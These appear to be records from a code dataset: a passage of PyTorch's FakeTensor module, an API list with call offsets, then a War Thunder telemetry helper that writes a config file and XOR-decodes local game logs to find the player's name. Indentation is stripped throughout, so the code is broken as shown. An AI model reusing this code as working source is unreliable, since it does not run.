def __call__(self, fake_mode, t, device=None):
assert t.device.type != "meta" or device is not None
if t.device.type != "meta":
return self.from_real_tensor(fake_mode, t)
else:
return self.from_meta_and_device(fake_mode, t, device)
op_implementations = []
def register_op_impl(run_impl_check: Union[Callable[[OpOverload], bool], OpOverload]):
def impl_decorator(op_impl):
global op_implementations
if isinstance(run_impl_check, OpOverload):
op_implementations.append((lambda func: func == run_impl_check, op_impl))
else:
op_implementations.append((run_impl_check, op_impl))
return op_impl
return impl_decorator
@register_op_impl(lambda func: (_is_tensor_constructor(func) or func in _like_tensor_constructors))
def contructors(fake_mode, func, *args, **kwargs):
assert func not in _non_kwarg_device_constructors
_, new_kwargs = normalize_function(
func, args=args, kwargs=kwargs, normalize_to_only_use_kwargs=True
)
if func in _like_tensor_constructors:
default_device = new_kwargs["input"].device
# TODO: file issue
args = (new_kwargs.pop("input"),)
else:
# cpu is default device if none is specified
default_device = torch.device("cpu")
args = ()
out_device = new_kwargs.pop("device", None)
out_device = out_device if out_device is not None else default_device
new_kwargs["device"] = torch.device("meta")
r = func(*args, **new_kwargs)
return FakeTensor(fake_mode, r, out_device)
@register_op_impl(lambda func: func in (aten.to.prim_Device, aten.to.device))
def non_kwarg_to(fake_mode, func, *args, **kwargs):
_, new_kwargs = normalize_function(
func, args, kwargs, normalize_to_only_use_kwargs=True
)
input_device = new_kwargs["device"]
out_device = input_device if input_device else new_kwargs["input"].device
new_kwargs["device"] = torch.device("meta")
r = func(*args, **new_kwargs)
return fake_mode.fake_tensor_converter(fake_mode, r, out_device)
# Dont default to default device handling,
# since the device of `the_template` is ignored
@register_op_impl(aten.resize_as_.default)
def resize_as_(fake_mode, func, *args, **kwargs):
return func(*args, **kwargs)
# _to_copy fails when run with FakeTensors to cuda device
# TODO: debug
@register_op_impl(torch.ops.aten._to_copy.default)
def to_copy(fake_mode, func, *args, **kwargs):
_, new_kwargs = normalize_function(
func, args=args, kwargs=kwargs, normalize_to_only_use_kwargs=True
)
input_device = new_kwargs.pop("device", None)
out_device = input_device if input_device else new_kwargs["input"].device
with no_dispatch():
input = new_kwargs.pop("input").to("meta")
return FakeTensor(
fake_mode, torch.ops.aten._to_copy(input, **new_kwargs), out_device
)
@register_op_impl(torch.ops.aten.clone.default)
def clone(fake_mode, func, input, memory_format=None):
out_device = input.device
with no_dispatch():
out = torch.ops.aten._to_copy(input.to("meta"), memory_format=memory_format)
return FakeTensor(fake_mode, out, out_device)
# index.Tensor data-dependent in only some conditions
@register_op_impl(lambda func: torch.Tag.dynamic_output_shape in func.tags # type: ignore[attr-defined]
and func != aten.index.Tensor)
def data_dep_op(fake_mode, func, *args, **kwargs):
raise DynamicOutputShapeException(func)
# Bool Indices get Expanded as Masks
# See: IndexingUtils.h:expandTensors
def check_no_bool_index_tensors(func, self, indices):
for index in indices:
if index is not None and index.dtype in (torch.bool, torch.uint8):
raise DynamicOutputShapeException(func)
# Meta tensors give you the ability to run PyTorch code without having to
# actually do computation through tensors allocated on a `meta` device.
# Because the device is `meta`, meta tensors do not model device propagation.
# FakeTensor extends MetaTensors to also carry an additional `fake_device`
# which tracks devices that would have been used.
class FakeTensor(torch.Tensor):
fake_device: torch.device
fake_mode: "FakeTensorMode"
@staticmethod
def __new__(cls, fake_mode, elem, device):
return torch.Tensor._make_subclass(
cls, elem, elem.requires_grad, dispatch_device=True
)
def __init__(self, fake_mode, elem, device: Union[torch.device, str]):
# elem does not need to be recorded, because FakeTensor *is a* elem
assert elem.device.type == "meta"
device = device if isinstance(device, torch.device) else torch.device(device)
assert device.type != "meta"
self.fake_device = device
self.fake_mode = fake_mode
@staticmethod
def from_tensor(t, fake_mode):
existing_device = t.device
return FakeTensor(fake_mode, t.to(device="meta"), existing_device)
# TODO: resolve error in default __repr__
def __repr__(self):
return f"FakeTensor({self.fake_device}, {self.size()}, {self.dtype})"
def new(self, *args, **kwargs):
# torch.Tensor.new does not go through the normal dispatcher pattern
# so in order to use the same pattern as normal invocation of
# returning meta device within the kernel we need to intercept
# the call here
out_device = self.fake_device
if "device" in kwargs:
kwarg_device = kwargs.pop("device")
out_device = kwarg_device if kwarg_device else out_device
kwargs["device"] = "meta"
self.in_kernel_invocation = True
try:
with no_dispatch():
meta_out = super().new(*args, **kwargs)
finally:
self.in_kernel_invocation = False
with no_dispatch():
return FakeTensor(self.fake_mode, meta_out, out_device)
@classmethod
def __torch_dispatch__(cls, func, types, args=(), kwargs=None):
# need to handle here to avoid infinite recursion
# see [in_kernel_invocation]
if func == torch.ops.prim.device.default:
assert len(args) == 1 and isinstance(args[0], FakeTensor)
if args[0].fake_mode.in_kernel_invocation:
return torch.device("meta")
else:
return args[0].fake_device
fake_mode = None
for arg in itertools.chain(tree_flatten(args)[0], tree_flatten(kwargs)[0]):
if isinstance(arg, FakeTensor):
if fake_mode is None:
fake_mode = arg.fake_mode
else:
assert fake_mode is arg.fake_mode, "Mixing modes NYI"
with enable_torch_dispatch_mode(fake_mode):
return func(*args, **kwargs)
@staticmethod
def _find_common_device(func, args, kwargs):
# cpu - zero-dim tensors can be called in cuda kernels,
# so overwrite the common_device if it the only existing
# device comes from a cpu zero-dim tensor
common_device = None
is_cpu_zero_dim = None
def cpu_zero_dim(t):
return t.device.type == "cpu" and t.dim() == 0
def merge_devices(t):
nonlocal common_device
nonlocal is_cpu_zero_dim
if not isinstance(t, FakeTensor):
return
if common_device is None:
common_device = t.device
is_cpu_zero_dim = cpu_zero_dim(t)
return
t_is_cpu_zero_dim = cpu_zero_dim(t)
if t.device == common_device:
if is_cpu_zero_dim:
is_cpu_zero_dim = t_is_cpu_zero_dim
return
# mismatching devices !
# if current tensor is cpu 0 dim, defer to existing device
if t_is_cpu_zero_dim:
return
# current device is from cpu 0 dim tensor, overwrite
if is_cpu_zero_dim:
common_device = t.device
is_cpu_zero_dim = t_is_cpu_zero_dim
return
# mismatching devices of non-zero dim tensors, throw
# This might be valid behavior and need to be explicitly modeled, e.g. reshape_as
raise Exception(
f"Unhandled FakeTensor Device Propagation for {func}, found two different devices {common_device}, {t.device}"
)
tree_map(merge_devices, args)
tree_map(merge_devices, kwargs)
assert common_device is not None, f"Could not find common device for {func}"
return common_device
__torch_function__ = torch._C._disabled_torch_function_impl
# We keep one instantiation of `fake_tensor_converter` active
# for the duration of `with torch_enable_mode(FakeTensorMode)`.
# This allows accurate storage aliasing across invocation of
# different operators. While this will keep all freshly allocated
# tensors alive during `FakeTensorMode`, there will no be no
# new allocations of Tensors which have non-meta storage so
# memory should not significantly incraese.
class FakeTensorMode(TorchDispatchMode):
def __init__(self, allow_cpu_fallback=True):
self.allow_cpu_fallback = allow_cpu_fallback
self.fake_tensor_converter = FakeTensorConverter()
# [in_kernel_invocation]
# when FakeTensor is invoked in user code, .device should return
# the fake_device of the tensor so that code such as as `if x.is_cuda`
# or torch.zeros([10, 10], device=x.device) continues to execute as if
# the FakeTensor were real. However, within kernel execution, we return
# the `Meta` device because all computation within the kernels should
# behave as if the Tensors are on meta devices. Kernels should allocate
# new tensors on meta devices, and checks like `is_meta` should return true.
# within python refs, we always return the real device by defining
# the device property
self.in_kernel_invocation = False
def __torch_dispatch__(self, func, types, args=(), kwargs=None):
kwargs = kwargs if kwargs else {}
if func == torch.ops.prim.device.default:
assert len(args) == 1 and isinstance(args[0], FakeTensor)
if args[0].fake_mode.in_kernel_invocation:
return torch.device("meta")
else:
return args[0].fake_device
# prims already wrap FakeTensor inputs to FakeTensor outputs
# and do device logic, we dont need do anything but run them
if "prims::" in func._schema.name:
with no_dispatch():
return func(*args, **kwargs)
with no_dispatch():
# TODO: apply as no_dispatch decorator
converter = self.fake_tensor_converter
# this is generated from torch.tensor(), which does not use the
# dispatcher, to allow wrapper subclasses to wrap the new tensor
# we need to handle before error checking
if func == torch.ops.aten.lift.default:
assert (
len(kwargs) == 0
and len(args) == 1
and type(args[0]) is torch.Tensor
)
with no_dispatch():
return converter(self, args[0])
def wrap(e, device=None):
if isinstance(e, torch.Tensor) and not isinstance(e, FakeTensor):
return converter(self, e, device)
else:
return e
# if we are in the dispatch mode, we will enter this function even if the inputs
# are not FakeTensors. For now, throw if any non-Fake Tensor inputs
# and just support constructors. TODO: extend more broadly
conversion_made = False
def check_non_fake_tensor(x):
nonlocal conversion_made
conversion_made = conversion_made or (
isinstance(x, torch.Tensor) and not isinstance(x, FakeTensor)
)
tree_map(check_non_fake_tensor, args)
tree_map(check_non_fake_tensor, kwargs)
if conversion_made:
raise Exception(
"Invoking operators with non-Fake Tensor inputs in FakeTensorMode is not yet supported. "
f"Please convert all Tensors to FakeTensors first. Found in {func}"
)
for run_impl_check, op_impl in op_implementations:
if run_impl_check(func):
return op_impl(self, func, *args, **kwargs)
if func == aten.index.Tensor:
check_no_bool_index_tensors(func, *args, **kwargs)
self.in_kernel_invocation = True
try:
r = func(*args, **kwargs)
except NotImplementedError as not_implemented_error:
if not self.allow_cpu_fallback:
raise not_implemented_error
r = run_cpu_fallback(func, args, kwargs, not_implemented_error)
finally:
self.in_kernel_invocation = False
# TODO: handle non-kwarg devices
assert func not in _device_not_kwarg_ops, f"NYI: {func}"
# if device is specified, use that
if kwargs.get("device", None):
return tree_map(partial(wrap, device=kwargs["device"]), r)
common_device = FakeTensor._find_common_device(func, args, kwargs)
return tree_map(partial(wrap, device=common_device), r)
def from_tensor(self, tensor):
return self.fake_tensor_converter(self, tensor)
def run_cpu_fallback(func, args, kwargs, orig_not_implemented_exception):
with no_dispatch():
def to_cpu(e):
if isinstance(e, FakeTensor):
return torch.zeros_like(e, device="cpu")
return e
try:
args = tree_map(to_cpu, args)
kwargs = tree_map(to_cpu, kwargs)
r = func(*args, **kwargs)
except Exception as new_exception:
raise orig_not_implemented_exception from new_exception
tensor_impls = set()
storages = set()
for e in tree_flatten((args, kwargs))[0]:
if isinstance(e, torch.Tensor):
tensor_impls.add(e)
storages.add(e.storage()._cdata)
# TODO: also check metadata change on inputs
# proper aliasing/metadata relationship between outputs and inputs will
# not be set up, bc of conversion to cpu, error on reused impls
for e in tree_flatten(r)[0]:
if e in tensor_impls or (
isinstance(e, torch.Tensor) and e.storage()._cdata in storages
):
raise orig_not_implemented_exception
# we're only converting these to MetaTensors now, not Fake Tensors,
# and the cpu inputs should be temporary. just convert outputs to meta
# and continue
return tree_map(MetaConverter(), r)
# Just for use to allow copying a module to fake tensors,
# does not apply elsewhere
class FakeCopyMode(TorchFunctionMode):
def __init__(self, fake_mode):
self.fake_mode = fake_mode
def __torch_function__(self, func, types, args=(), kwargs=None):
kwargs = kwargs if kwargs else {}
# clone will get called in Parameter deepcopy
if func == torch._C._TensorBase.clone:
return func(self.fake_mode.from_tensor(args[0]), **kwargs)
elif func == torch.Tensor.__deepcopy__:
assert len(args) == 2 and len(kwargs) == 0
tensor, memo = args
if id(tensor) in memo:
return memo[id(tensor)]
out = self.fake_mode.from_tensor(tensor)
memo[id(tensor)] = out
return out
else:
with torch._C.DisableTorchFunction():
return func(*args, **kwargs)
|
[
"torch.nn.Parameter",
"functools.partial",
"torch.zeros_like",
"torch._subclasses.meta_utils.MetaConverter",
"torch.utils._python_dispatch.enable_torch_dispatch_mode",
"torch.ops.aten._to_copy",
"torch.utils._pytree.tree_flatten",
"torch.Tensor._make_subclass",
"torch.utils._mode_utils.no_dispatch",
"torch._C.DisableTorchFunction",
"torch.device",
"functools.lru_cache",
"torch.utils._pytree.tree_map",
"torch.fx.operator_schemas.normalize_function",
"torch._C.TensorType.get",
"weakref.WeakValueDictionary"
] |
[((1770, 1795), 'functools.lru_cache', 'functools.lru_cache', (['None'], {}), '(None)\n', (1789, 1795), False, 'import functools\n'), ((1178, 1203), 'torch._C.TensorType.get', 'torch._C.TensorType.get', ([], {}), '()\n', (1201, 1203), False, 'import torch\n'), ((5101, 5190), 'torch.fx.operator_schemas.normalize_function', 'normalize_function', (['func'], {'args': 'args', 'kwargs': 'kwargs', 'normalize_to_only_use_kwargs': '(True)'}), '(func, args=args, kwargs=kwargs,\n normalize_to_only_use_kwargs=True)\n', (5119, 5190), False, 'from torch.fx.operator_schemas import normalize_function\n'), ((5639, 5659), 'torch.device', 'torch.device', (['"""meta"""'], {}), "('meta')\n", (5651, 5659), False, 'import torch\n'), ((5893, 5966), 'torch.fx.operator_schemas.normalize_function', 'normalize_function', (['func', 'args', 'kwargs'], {'normalize_to_only_use_kwargs': '(True)'}), '(func, args, kwargs, normalize_to_only_use_kwargs=True)\n', (5911, 5966), False, 'from torch.fx.operator_schemas import normalize_function\n'), ((6126, 6146), 'torch.device', 'torch.device', (['"""meta"""'], {}), "('meta')\n", (6138, 6146), False, 'import torch\n'), ((6661, 6750), 'torch.fx.operator_schemas.normalize_function', 'normalize_function', (['func'], {'args': 'args', 'kwargs': 'kwargs', 'normalize_to_only_use_kwargs': '(True)'}), '(func, args=args, kwargs=kwargs,\n normalize_to_only_use_kwargs=True)\n', (6679, 6750), False, 'from torch.fx.operator_schemas import normalize_function\n'), ((2772, 2801), 'weakref.WeakValueDictionary', 'weakref.WeakValueDictionary', ([], {}), '()\n', (2799, 2801), False, 'import weakref\n'), ((2832, 2847), 'torch._subclasses.meta_utils.MetaConverter', 'MetaConverter', ([], {}), '()\n', (2845, 2847), False, 'from torch._subclasses.meta_utils import MetaConverter\n'), ((5452, 5471), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (5464, 5471), False, 'import torch\n'), ((6899, 6912), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (6910, 6912), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((7225, 7238), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (7236, 7238), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((8492, 8577), 'torch.Tensor._make_subclass', 'torch.Tensor._make_subclass', (['cls', 'elem', 'elem.requires_grad'], {'dispatch_device': '(True)'}), '(cls, elem, elem.requires_grad, dispatch_device=True\n )\n', (8519, 8577), False, 'import torch\n'), ((12634, 12663), 'torch.utils._pytree.tree_map', 'tree_map', (['merge_devices', 'args'], {}), '(merge_devices, args)\n', (12642, 12663), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((12672, 12703), 'torch.utils._pytree.tree_map', 'tree_map', (['merge_devices', 'kwargs'], {}), '(merge_devices, kwargs)\n', (12680, 12703), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((17981, 17994), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (17992, 17994), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((19241, 19256), 'torch._subclasses.meta_utils.MetaConverter', 'MetaConverter', ([], {}), '()\n', (19254, 19256), False, 'from torch._subclasses.meta_utils import MetaConverter\n'), ((2134, 2159), 'torch._C.TensorType.get', 'torch._C.TensorType.get', ([], {}), '()\n', (2157, 2159), False, 'import torch\n'), ((3584, 3597), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (3595, 3597), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((3740, 3796), 'torch.nn.Parameter', 'torch.nn.Parameter', (['out'], {'requires_grad': 'out.requires_grad'}), '(out, requires_grad=out.requires_grad)\n', (3758, 3796), False, 'import torch\n'), ((7015, 7059), 'torch.ops.aten._to_copy', 'torch.ops.aten._to_copy', (['input'], {}), '(input, **new_kwargs)\n', (7038, 7059), False, 'import torch\n'), ((8854, 8874), 'torch.device', 'torch.device', (['device'], {}), '(device)\n', (8866, 8874), False, 'import torch\n'), ((10017, 10030), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (10028, 10030), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((10909, 10946), 'torch.utils._python_dispatch.enable_torch_dispatch_mode', 'enable_torch_dispatch_mode', (['fake_mode'], {}), '(fake_mode)\n', (10935, 10946), False, 'from torch.utils._python_dispatch import TorchDispatchMode, enable_torch_dispatch_mode\n'), ((14910, 14923), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (14921, 14923), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((16307, 16344), 'torch.utils._pytree.tree_map', 'tree_map', (['check_non_fake_tensor', 'args'], {}), '(check_non_fake_tensor, args)\n', (16315, 16344), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((16357, 16396), 'torch.utils._pytree.tree_map', 'tree_map', (['check_non_fake_tensor', 'kwargs'], {}), '(check_non_fake_tensor, kwargs)\n', (16365, 16396), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((18172, 18194), 'torch.utils._pytree.tree_map', 'tree_map', (['to_cpu', 'args'], {}), '(to_cpu, args)\n', (18180, 18194), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((18216, 18240), 'torch.utils._pytree.tree_map', 'tree_map', (['to_cpu', 'kwargs'], {}), '(to_cpu, kwargs)\n', (18224, 18240), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((18464, 18492), 'torch.utils._pytree.tree_flatten', 'tree_flatten', (['(args, kwargs)'], {}), '((args, kwargs))\n', (18476, 18492), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((18849, 18864), 'torch.utils._pytree.tree_flatten', 'tree_flatten', (['r'], {}), '(r)\n', (18861, 18864), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((9869, 9882), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (9880, 9882), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((10479, 10499), 'torch.device', 'torch.device', (['"""meta"""'], {}), "('meta')\n", (10491, 10499), False, 'import torch\n'), ((10622, 10640), 'torch.utils._pytree.tree_flatten', 'tree_flatten', (['args'], {}), '(args)\n', (10634, 10640), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((10645, 10665), 'torch.utils._pytree.tree_flatten', 'tree_flatten', (['kwargs'], {}), '(kwargs)\n', (10657, 10665), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((14555, 14575), 'torch.device', 'torch.device', (['"""meta"""'], {}), "('meta')\n", (14567, 14575), False, 'import torch\n'), ((14836, 14849), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (14847, 14849), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((17765, 17800), 'functools.partial', 'partial', (['wrap'], {'device': 'common_device'}), '(wrap, device=common_device)\n', (17772, 17800), False, 'from functools import partial\n'), ((18084, 18117), 'torch.zeros_like', 'torch.zeros_like', (['e'], {'device': '"""cpu"""'}), "(e, device='cpu')\n", (18100, 18117), False, 'import torch\n'), ((15481, 15494), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (15492, 15494), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((17613, 17651), 'functools.partial', 'partial', (['wrap'], {'device': "kwargs['device']"}), "(wrap, device=kwargs['device'])\n", (17620, 17651), False, 'from functools import partial\n'), ((20096, 20127), 'torch._C.DisableTorchFunction', 'torch._C.DisableTorchFunction', ([], {}), '()\n', (20125, 20127), False, 'import torch\n')]
|
import configparser
import getpass
import glob
import os
import pathlib
import platform
import re
import socket
import sys
import threading
import time
import loguru
import psutil
import requests
from cursor import cursor
class CFG:
def __init__(self):
self.i18n = None
self.cfg_gen = None
self.cfg_net = None
self.cfg_log = None
self.cfg_dbg = None
self.cfg_ftp = None
self.cfg_pyu = None
self.cfg_dir = None
self.cfg_cfg = None
self.clog_files = None
self.game_version = None
self.user_units_file = None
self.game_settings_file = None
self.user_settings_file = None
self.game_settings_root = None
self.user_settings_root = None
self.tacv_textures_root = None
self.acmi_localdir_root = None
self.players_sys = platform.system()
self.players_uid = getpass.getuser()
self.players_cid = socket.gethostname()
self.players_arc = platform.architecture()
self.cp = configparser.ConfigParser()
self.game_settings_root = self.get_war_paths()
if self.players_sys == "Darwin":
wargame_cfg = 'My Games/WarThunder'
elif self.players_sys == "Linux":
wargame_cfg = '.config/WarThunder'
elif self.players_sys == "Windows":
wargame_cfg = 'Documents/My Games/WarThunder'
else:
wargame_cfg = None
self.config_file_name = "thundertac.ini"
self.user_settings_root = pathlib.Path.home().joinpath(wargame_cfg)
if not self.user_settings_root.is_dir():
self.user_settings_root.mkdir(mode=0o777, parents=True, exist_ok=False)
self.user_settings_file = self.user_settings_root.joinpath(self.config_file_name)
if self.game_settings_root is not None:
self.i18n = self.aces_language().replace('"', '')
self.game_version = self.get_game_version()
# TODO: this isn't finished
if self.players_sys == 'Linux':
loguru.logger.warning("*nix users must manually enter the path to there WINE installed Tacview root + "
"/Data/Terrain/Textures/ \nEX:'/home/divine/Programs/Tacview (beta)"
"/Data/Terrain/Textures/'")
elif self.players_sys == 'Windows':
# TODO: switch to pathlib if possible
self.tacv_textures_root = os.path.join(os.environ['APPDATA'], "Tacview\\Data\\Terrain\\Textures")
self.acmi_localdir_root = pathlib.Path.home().joinpath('Documents/ACMI')
if not self.acmi_localdir_root.is_dir():
self.acmi_localdir_root.mkdir(mode=0o777, parents=True, exist_ok=False)
# create thundertac.ini if not exist
if not self.user_settings_file.exists():
self.create_cfg()
self.read_cfg()
def remove_cfg(self):
pathlib.Path(self.user_settings_file).unlink(missing_ok=True)
self.create_cfg()
def create_cfg(self):
d = {
# TODO: CHECK PATH TO LINUX GAME LOGS FOLDER
'Linux': self.user_settings_root.joinpath('.game_logs/'),
'Windows': pathlib.Path(self.game_settings_root).joinpath('.game_logs/')
}
path_war_clogdir = d[platform.system()]
self.clog_files = glob.glob(f"{str(path_war_clogdir)}/*.clog")
while True:
user_alias_data = self.get_user_alias()
try:
user_alias = user_alias_data[0]
user_gid = user_alias_data[1]
except TypeError:
self.clog_files.pop()
else:
break
self.cp['network'] = {}
self.cp['general'] = {}
self.cp['loguru'] = {}
self.cp['debug'] = {}
self.cp['ftpcred'] = {}
self.cp['pyupdater'] = {}
self.cp['path'] = {}
self.cp['configinit'] = {}
self.cp['network']['net_host'] = "127.0.0.1" # self.players_cid
self.cp['network']['net_port'] = "8111"
self.cp['general']['ttac_usr'] = user_alias
self.cp['general']['ttac_mas'] = user_alias
self.cp['general']['ttac_rec'] = "ttac.rec"
self.cp['general']['ttac_int'] = "0.02"
self.cp['general']['user_gid'] = user_gid
self.cp['general']['war_lang'] = self.i18n[:-1]
self.cp['loguru']['logger_l'] = "DEBUG"
self.cp['debug']['debug_on'] = "True"
self.cp['ftpcred']['ftp_send'] = "False"
self.cp['ftpcred']['ftp_addr'] = "ftp.thundertac.altervista.org"
self.cp['ftpcred']['ftp_user'] = "thundertac"
self.cp['ftpcred']['ftp_pass'] = "<PASSWORD>"
self.cp['ftpcred']['ftp_sess'] = "WIP"
self.cp['pyupdater']['pyu_uchn'] = "stable"
self.cp['pyupdater']['pyu_schn'] = "True"
self.cp['path']['war_root'] = self.game_settings_root.__str__()
self.cp['path']['cfg_root'] = self.user_settings_root.__str__()
self.cp['path']['tex_root'] = self.tacv_textures_root.__str__()
self.cp['path']['rec_root'] = self.acmi_localdir_root.__str__()
self.cp['configinit']['init_run'] = "True"
with open(self.user_settings_file, 'w') as f:
self.cp.write(f)
def read_cfg(self):
self.cp.read(self.user_settings_file)
# self.game_install_path = self.cp['path']['war_path']
# for section_title, section_values in (dict(self.cp.items())).items():
# print(dict(section_values))
self.cfg_net = dict(self.cp.items('network'))
self.cfg_gen = dict(self.cp.items('general'))
self.cfg_log = dict(self.cp.items('loguru'))
self.cfg_dbg = dict(self.cp.items('debug'))
self.cfg_ftp = dict(self.cp.items('ftpcred'))
self.cfg_pyu = dict(self.cp.items('pyupdater'))
self.cfg_dir = dict(self.cp.items('path'))
self.cfg_cfg = dict(self.cp.items('configinit'))
def get_war_paths(self):
try:
self.game_settings_root = pathlib.Path(self.cfg_dir['war_path'])
self.game_settings_file = self.game_settings_root.joinpath('config.blk')
if self.game_settings_file.is_file():
return
except TypeError:
cursor.hide()
while self.game_settings_root is None:
try:
platform_lookup = {"Darwin": "aces", "Linux": "aces", "Windows": "aces.exe"}
target = platform_lookup[self.players_sys]
pid_list = [pid.pid for pid in psutil.process_iter() if pid.name() == target]
if 0 < len(pid_list):
proc = pathlib.Path((psutil.Process(pid_list[0])).exe())
self.game_settings_root = proc.parent.parent
return self.game_settings_root
else:
with Spinner():
time.sleep(.90)
except KeyboardInterrupt:
cursor.show()
sys.exit()
def get_game_version(self):
if self.game_settings_root:
version_file = self.game_settings_root.joinpath('content/pkg_main.ver')
with open(version_file, "r") as frv:
self.game_version = frv.read()
return self.game_version
def get_user_alias(self):
def un_xor(data):
xor_key = bytearray(b"\<KEY>"
b"\<KEY>"
b"\x4E\xE1\x5A\xF9\xF1\x01\x4B\xB1\xAD\xB6\x4C\x4C\xFA\x74\x28\x69"
b"\xC2\x8B\x11\x17\xD5\xB6\x47\xCE\xB3\xB7\xCD\x55\xFE\xF9\xC1\x24"
b"\xFF\xAE\x90\x2E\x49\x6C\x4E\x09\x92\x81\x4E\x67\xBC\x6B\x9C\xDE"
b"\xB1\x0F\x68\xBA\x8B\x80\x44\x05\x87\x5E\xF3\x4E\xFE\x09\x97\x32"
b"\<KEY>"
b"\x53\x00\x3C\xA6\xB8\x22\x41\x32\xB1\xBD\xF5\x28\x50\xE0\x72\xAE")
d_data = bytearray(len(data))
key_length = len(xor_key)
for i, c in enumerate(data):
d_data[i] = c ^ xor_key[(i % key_length)]
# sys.stdout.write(chr(d_data[i]))
# print(chr(c))
# time.sleep(0.001)
return d_data
last_clog_fileis = max(self.clog_files, key=os.path.getctime)
with open(last_clog_fileis, 'rb') as f:
xor_ed = f.read()
xor_ed_byte_array = bytearray(xor_ed)
un_xor_ed = un_xor(xor_ed_byte_array)
decode_type = None
decoded = None
if self.players_sys == "Darwin":
pass
elif self.players_sys == "Linux":
import cchardet as chardet
result = chardet.detect(bytes(un_xor_ed))
decode_type = result['encoding']
elif self.players_sys == "Windows":
decode_type = 'ANSI'
try:
decoded = bytes(un_xor_ed).decode(decode_type)
except UnicodeDecodeError as get_user_alias_unicode_decode_error:
import cchardet as chardet
result = chardet.detect(bytes(un_xor_ed))
decode_type = result['encoding']
decoded = bytes(un_xor_ed).decode(decode_type)
finally:
# with open('unxored', 'w', encoding='utf-8') as f:
# f.write(decoded)
xxx = re.search(r"(\w+)\[(\d+)] successfully passed yuplay authorization", decoded, re.M)
if xxx:
print(xxx.groups())
user_alias, user_gj_id = xxx.group(1), xxx.group(2)
return user_alias, user_gj_id
# except LookupError as err_lookup_err_cfg_xor_decryption:
# loguru.logger.exception(err_lookup_err_cfg_xor_decryption)
# sys.exit()
def aces_language(self):
path_config_blk = self.game_settings_root.joinpath('config.blk')
with open(path_config_blk) as f:
lines = f.readlines()
for line in lines:
if line.startswith('language'):
return line.split(':t=')[1]
class API(CFG):
# TODO: INHERIT FRO CFG INSTEAD OF CREATING INSTANCE OF CFG
def __init__(self, port=8111):
super().__init__()
base_address = f"http://{self.players_cid}:{port}"
self.LMAP = f"{base_address}/map.img"
self.INFO = f"{base_address}/map_info.json"
self.STAT = f"{base_address}/state"
self.INDI = f"{base_address}/indicators"
self.OBJT = f"{base_address}/map_obj.json"
self.CHAT = f"{base_address}/gamechat"
self.HMSG = f"{base_address}/hudmsg"
def gamechat(self, lastId=0):
data = requests.get(f'{self.CHAT}?lastId={lastId}').json()[-1]
print(data)
class Spinner:
busy = False
delay = 0.01
@staticmethod
def spinning_cursor():
s = "WAITING "
while True:
spinner_list = []
for s_index, s_value in enumerate(s):
s_prefix = 11
s_suffix = 0 + s_index
for j, jj in enumerate(s):
if (s_index + j) <= len(s):
spinner_list.append(s[0:s_index] + " "*(s_prefix-s_index) + s_value + " "*s_suffix)
s_prefix -= 1
s_suffix += 1
for cursor_iteration in spinner_list:
yield cursor_iteration
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\r')
sys.stdout.flush()
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
if exception is not None:
return False
if __name__ == '__main__':
# TODO: return to pass before building
a = CFG()
# class UserInfo:
#
# def __init__(self):
#
# self.game_install_path = None
#
# self.config_file_name = "thundertac.ini"
# cp = configparser.ConfigParser()
#
# self.players_sys = platform.system()
# self.players_uid = getpass.getuser()
# self.players_cid = socket.gethostname()
# self.players_arc = platform.architecture()
#
# if self.players_sys == "Darwin":
# # self.players_uid = "MAC SUPPORT LIMITED - HELP NEEDED"
# self.wargame_cfg = 'My Games/WarThunder'
#
# elif self.players_sys == "Linux":
# # self.players_uid = os.getenv('USER')
# self.wargame_cfg = '.config/WarThunder'
#
# elif self.players_sys == "Windows":
# # self.players_uid = os.getenv('USERNAME')
# self.wargame_cfg = 'Documents/My Games/WarThunder'
#
# self.game_settings_root = pathlib.Path.home().joinpath(self.wargame_cfg)
# self.tacx_settings_file = self.game_settings_root.joinpath(self.config_file_name)
#
# self.wargame_dir_known = False
#
# self.game_install_path = self.get_game_root_dir()
#
# # cp.read(self.tacx_settings_file)
# # if cp.has_section('path'):
# # if pathlib.Path(cp['path']['war_path']).exists():
# # self.game_install_path = pathlib.Path(cp['path']['war_path'])
# # if self.game_install_path == "":
# # self.game_install_path = self.get_game_root_dir()
# # cp['path']['war_path'] = str(self.game_install_path)
# # with open(self.tacx_settings_file, 'w') as f:
# # cp.write(f)
#
# def get_game_root_dir(self):
# platform_lookup = {"Windows": "aces.exe", "Linux": "aces"}
# for pid in psutil.pids():
# psutil.Process(pid).name()
